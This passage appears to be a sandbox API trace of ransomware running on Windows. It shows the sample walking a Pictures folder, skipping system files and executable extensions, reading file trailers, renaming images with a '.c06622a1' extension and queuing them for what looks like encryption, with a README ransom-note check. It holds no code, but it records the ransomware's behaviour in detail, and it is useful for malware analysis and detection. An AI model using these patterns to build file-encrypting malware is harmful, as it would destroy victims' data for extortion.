wcslen (_String="msu") returned 0x3 [0167.613] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.613] wcslen (_String="nls") returned 0x3 [0167.613] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.613] wcslen (_String="nomedia") returned 0x7 [0167.613] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.613] wcslen (_String="ocx") returned 0x3 [0167.613] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.613] wcslen (_String="prf") returned 0x3 [0167.613] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.613] wcslen (_String="ps1") returned 0x3 [0167.613] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.614] wcslen (_String="rom") returned 0x3 [0167.614] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.614] wcslen (_String="rtp") returned 0x3 [0167.614] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.614] wcslen (_String="scr") returned 0x3 [0167.614] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.614] wcslen (_String="shs") returned 0x3 [0167.614] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.614] wcslen (_String="spl") returned 0x3 [0167.614] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.614] wcslen (_String="sys") returned 0x3 [0167.614] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.614] wcslen (_String="theme") returned 0x5 [0167.614] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.614] wcslen (_String="themepack") returned 0x9 [0167.614] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.614] wcslen (_String="wpx") returned 0x3 [0167.614] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.614] wcslen (_String="lock") returned 0x4 [0167.614] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.614] wcslen (_String="key") returned 0x3 [0167.614] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.614] wcslen (_String="hta") returned 0x3 [0167.614] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.614] wcslen (_String="msi") returned 0x3 [0167.614] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.614] wcslen (_String="pdb") returned 0x3 [0167.614] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.614] wcslen (_String="sqlite") returned 0x6 [0167.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.615] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.615] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.615] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.615] wcscpy (in: _Dest=0x32a212e, _Source="aBEfoYUIJCal0VU4J.jpg" | out: _Dest="aBEfoYUIJCal0VU4J.jpg") returned="aBEfoYUIJCal0VU4J.jpg" [0167.615] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg", dwFileAttributes=0x80) returned 1 [0167.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\abefoyuijcal0vu4j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0167.615] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.615] ReadFile (in: hFile=0x1dc, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.616] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x10aad6c3 [0167.616] RtlComputeCrc32 (PartialCrc=0xd6c3, Buffer=0x32e4a4, Length=0x80) returned 0xac1d7cbf [0167.616] RtlComputeCrc32 (PartialCrc=0x7cbf, Buffer=0x32e4a4, Length=0x80) returned 0x2f4cda5a [0167.616] RtlComputeCrc32 (PartialCrc=0xda5a, Buffer=0x32e4a4, Length=0x80) returned 0xbb8b5c46 [0167.616] RtlComputeCrc32 (PartialCrc=0x5c46, Buffer=0x32e4a4, Length=0x80) returned 0x5bd41855 [0167.616] CloseHandle (hObject=0x1dc) returned 1 [0167.616] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.616] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg" [0167.616] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg") returned 0x64 [0167.616] wcscpy (in: _Dest=0x32b2160, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.616] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\abefoyuijcal0vu4j.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\abefoyuijcal0vu4j.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\aBEfoYUIJCal0VU4J.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\abefoyuijcal0vu4j.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0167.621] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.622] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x453e1f3a [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1019d34c [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72fe0846 [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77fe7a68 [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4caf9d21 [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x666eea6c [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e81eca [0167.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7cfb77c8 [0167.633] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x6d0786a1 [0167.633] RtlComputeCrc32 (PartialCrc=0x86a1, Buffer=0x2b70094, Length=0x80) returned 0x3087bc3b [0167.633] RtlComputeCrc32 (PartialCrc=0xbc3b, Buffer=0x2b70094, Length=0x80) returned 0xb4c4bed5 [0167.633] RtlComputeCrc32 (PartialCrc=0xbed5, Buffer=0x2b70094, Length=0x80) returned 0x76dcfa59 [0167.633] RtlComputeCrc32 (PartialCrc=0xfa59, Buffer=0x2b70094, Length=0x80) returned 0x31f3399a [0167.633] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.633] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.633] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.633] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9966c0, ftCreationTime.dwHighDateTime=0x1d5db18, ftLastAccessTime.dwLowDateTime=0xbe3cc2c0, ftLastAccessTime.dwHighDateTime=0x1d5e2c7, ftLastWriteTime.dwLowDateTime=0xbe3cc2c0, ftLastWriteTime.dwHighDateTime=0x1d5e2c7, nFileSizeHigh=0x0, nFileSizeLow=0xc557, dwReserved0=0x0, dwReserved1=0x0, cFileName="BKUW-4LKwDMe.jpg", cAlternateFileName="BKUW-4~1.JPG")) returned 1 [0167.634] _wcsicmp (_Str1="BKUW-4LKwDMe.jpg", _Str2="README.c06622a1.TXT") returned -16 [0167.634] wcsstr (_Str="BKUW-4LKwDMe.jpg", _SubStr="README") returned 0x0 [0167.634] _wcsicmp (_Str1="autorun.inf", _Str2="BKUW-4LKwDMe.jpg") returned -1 [0167.634] wcslen (_String="autorun.inf") returned 0xb [0167.634] _wcsicmp (_Str1="boot.ini", _Str2="BKUW-4LKwDMe.jpg") returned 4 [0167.634] wcslen (_String="boot.ini") returned 0x8 [0167.634] _wcsicmp (_Str1="bootfont.bin", _Str2="BKUW-4LKwDMe.jpg") returned 4 [0167.634] wcslen (_String="bootfont.bin") returned 0xc [0167.634] _wcsicmp (_Str1="bootsect.bak", _Str2="BKUW-4LKwDMe.jpg") returned 4 [0167.634] wcslen (_String="bootsect.bak") returned 0xc [0167.634] _wcsicmp (_Str1="desktop.ini", _Str2="BKUW-4LKwDMe.jpg") returned 2 [0167.634] wcslen (_String="desktop.ini") returned 0xb [0167.634] _wcsicmp (_Str1="iconcache.db", _Str2="BKUW-4LKwDMe.jpg") returned 7 [0167.634] wcslen (_String="iconcache.db") returned 0xc [0167.634] _wcsicmp (_Str1="ntldr", _Str2="BKUW-4LKwDMe.jpg") returned 12 [0167.634] wcslen (_String="ntldr") returned 0x5 [0167.634] _wcsicmp (_Str1="ntuser.dat", _Str2="BKUW-4LKwDMe.jpg") returned 12 [0167.634] wcslen (_String="ntuser.dat") returned 0xa [0167.634] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BKUW-4LKwDMe.jpg") returned 12 [0167.634] wcslen (_String="ntuser.dat.log") returned 0xe [0167.634] _wcsicmp (_Str1="ntuser.ini", _Str2="BKUW-4LKwDMe.jpg") returned 12 [0167.634] wcslen (_String="ntuser.ini") returned 0xa [0167.634] _wcsicmp (_Str1="thumbs.db", _Str2="BKUW-4LKwDMe.jpg") returned 18 [0167.634] wcslen (_String="thumbs.db") returned 0x9 [0167.634] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.634] wcslen (_String="386") returned 0x3 [0167.634] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.634] wcslen (_String="adv") returned 0x3 [0167.634] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.634] wcslen (_String="ani") returned 0x3 [0167.635] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.635] wcslen (_String="bat") returned 0x3 [0167.635] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.635] wcslen (_String="bin") returned 0x3 [0167.635] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.635] wcslen (_String="cab") returned 0x3 [0167.635] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.635] wcslen (_String="cmd") returned 0x3 [0167.635] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.635] wcslen (_String="com") returned 0x3 [0167.635] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.635] wcslen (_String="cpl") returned 0x3 [0167.635] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.635] wcslen (_String="cur") returned 0x3 [0167.635] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.635] wcslen (_String="deskthemepack") returned 0xd [0167.635] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.635] wcslen (_String="diagcab") returned 0x7 [0167.635] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.635] wcslen (_String="diagcfg") returned 0x7 [0167.635] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.635] wcslen (_String="diagpkg") returned 0x7 [0167.635] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.635] wcslen (_String="dll") returned 0x3 [0167.635] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.635] wcslen (_String="drv") returned 0x3 [0167.635] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.635] wcslen (_String="exe") returned 0x3 [0167.635] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.635] wcslen (_String="hlp") returned 0x3 [0167.635] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.635] wcslen (_String="icl") returned 0x3 [0167.635] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.636] wcslen (_String="icns") returned 0x4 [0167.636] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.636] wcslen (_String="ico") returned 0x3 [0167.636] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.636] wcslen (_String="ics") returned 0x3 [0167.636] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.636] wcslen (_String="idx") returned 0x3 [0167.636] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.636] wcslen (_String="ldf") returned 0x3 [0167.636] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.636] wcslen (_String="lnk") returned 0x3 [0167.636] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.636] wcslen (_String="mod") returned 0x3 [0167.636] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.636] wcslen (_String="mpa") returned 0x3 [0167.636] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.636] wcslen (_String="msc") returned 0x3 [0167.636] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.636] wcslen (_String="msp") returned 0x3 [0167.636] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.636] wcslen (_String="msstyles") returned 0x8 [0167.636] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.636] wcslen (_String="msu") returned 0x3 [0167.636] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.636] wcslen (_String="nls") returned 0x3 [0167.636] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.636] wcslen (_String="nomedia") returned 0x7 [0167.636] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.636] wcslen (_String="ocx") returned 0x3 [0167.636] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.636] wcslen (_String="prf") returned 0x3 [0167.636] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.637] wcslen (_String="ps1") returned 0x3 [0167.637] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.637] wcslen (_String="rom") returned 0x3 [0167.637] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.637] wcslen (_String="rtp") returned 0x3 [0167.637] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.637] wcslen (_String="scr") returned 0x3 [0167.637] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.637] wcslen (_String="shs") returned 0x3 [0167.637] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.637] wcslen (_String="spl") returned 0x3 [0167.637] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.637] wcslen (_String="sys") returned 0x3 [0167.637] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.637] wcslen (_String="theme") returned 0x5 [0167.637] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.637] wcslen (_String="themepack") returned 0x9 [0167.637] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.637] wcslen (_String="wpx") returned 0x3 [0167.637] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.637] wcslen (_String="lock") returned 0x4 [0167.637] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.637] wcslen (_String="key") returned 0x3 [0167.637] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.637] wcslen (_String="hta") returned 0x3 [0167.637] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.637] wcslen (_String="msi") returned 0x3 [0167.637] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.637] wcslen (_String="pdb") returned 0x3 [0167.637] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.637] wcslen (_String="sqlite") returned 0x6 [0167.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.638] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.638] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.638] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.638] wcscpy (in: _Dest=0x32a212e, _Source="BKUW-4LKwDMe.jpg" | out: _Dest="BKUW-4LKwDMe.jpg") returned="BKUW-4LKwDMe.jpg" [0167.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg", dwFileAttributes=0x80) returned 1 [0167.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\bkuw-4lkwdme.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0167.638] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.638] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.639] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x29320cee [0167.639] RtlComputeCrc32 (PartialCrc=0xcee, Buffer=0x32e4a4, Length=0x80) returned 0x78968498 [0167.639] RtlComputeCrc32 (PartialCrc=0x8498, Buffer=0x32e4a4, Length=0x80) returned 0x981d56d [0167.639] RtlComputeCrc32 (PartialCrc=0xd56d, Buffer=0x32e4a4, Length=0x80) returned 0xf5bee65e [0167.639] RtlComputeCrc32 (PartialCrc=0xe65e, Buffer=0x32e4a4, Length=0x80) returned 0xbc7fb973 [0167.639] CloseHandle (hObject=0x1e4) returned 1 [0167.639] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.639] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg" [0167.639] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg") returned 0x5f [0167.640] wcscpy (in: _Dest=0x32b2156, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.640] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\bkuw-4lkwdme.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\bkuw-4lkwdme.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\BKUW-4LKwDMe.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\bkuw-4lkwdme.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0167.642] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.642] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3680020 [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27fb3d4f [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47a7ea6c [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x550f8c7f [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x101e5df2 [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a747b45 [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4add8c2c [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76318421 [0167.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2cce750b [0167.654] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3680094, Length=0x80) returned 0x696b5a08 [0167.654] RtlComputeCrc32 (PartialCrc=0x5a08, Buffer=0x3680094, Length=0x80) returned 0x3b8653e0 [0167.654] RtlComputeCrc32 (PartialCrc=0x53e0, Buffer=0x3680094, Length=0x80) returned 0x3e9654ac [0167.654] RtlComputeCrc32 (PartialCrc=0x54ac, Buffer=0x3680094, Length=0x80) returned 0x9f799b33 [0167.654] RtlComputeCrc32 (PartialCrc=0x9b33, Buffer=0x3680094, Length=0x80) returned 0xd40633a0 [0167.654] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0167.654] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.654] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.654] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8effdf0, ftCreationTime.dwHighDateTime=0x1d5dbe6, ftLastAccessTime.dwLowDateTime=0x86601c90, ftLastAccessTime.dwHighDateTime=0x1d5ddc1, ftLastWriteTime.dwLowDateTime=0x86601c90, ftLastWriteTime.dwHighDateTime=0x1d5ddc1, nFileSizeHigh=0x0, nFileSizeLow=0x10a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRW0yCfV58-.gif", cAlternateFileName="GRW0YC~1.GIF")) returned 1 [0167.654] _wcsicmp (_Str1="GRW0yCfV58-.gif", _Str2="README.c06622a1.TXT") returned -11 [0167.654] wcsstr (_Str="GRW0yCfV58-.gif", _SubStr="README") returned 0x0 [0167.654] _wcsicmp (_Str1="autorun.inf", _Str2="GRW0yCfV58-.gif") returned -6 [0167.654] wcslen (_String="autorun.inf") returned 0xb [0167.654] _wcsicmp (_Str1="boot.ini", _Str2="GRW0yCfV58-.gif") returned -5 [0167.654] wcslen (_String="boot.ini") returned 0x8 [0167.654] _wcsicmp (_Str1="bootfont.bin", _Str2="GRW0yCfV58-.gif") returned -5 [0167.654] wcslen (_String="bootfont.bin") returned 0xc [0167.654] _wcsicmp (_Str1="bootsect.bak", _Str2="GRW0yCfV58-.gif") returned -5 [0167.654] wcslen (_String="bootsect.bak") returned 0xc [0167.654] _wcsicmp (_Str1="desktop.ini", _Str2="GRW0yCfV58-.gif") returned -3 [0167.655] wcslen (_String="desktop.ini") returned 0xb [0167.655] _wcsicmp (_Str1="iconcache.db", _Str2="GRW0yCfV58-.gif") returned 2 [0167.655] wcslen (_String="iconcache.db") returned 0xc [0167.655] _wcsicmp (_Str1="ntldr", _Str2="GRW0yCfV58-.gif") returned 7 [0167.655] wcslen (_String="ntldr") returned 0x5 [0167.655] _wcsicmp (_Str1="ntuser.dat", _Str2="GRW0yCfV58-.gif") returned 7 [0167.655] wcslen (_String="ntuser.dat") returned 0xa [0167.655] _wcsicmp (_Str1="ntuser.dat.log", _Str2="GRW0yCfV58-.gif") returned 7 [0167.655] wcslen (_String="ntuser.dat.log") returned 0xe [0167.655] _wcsicmp 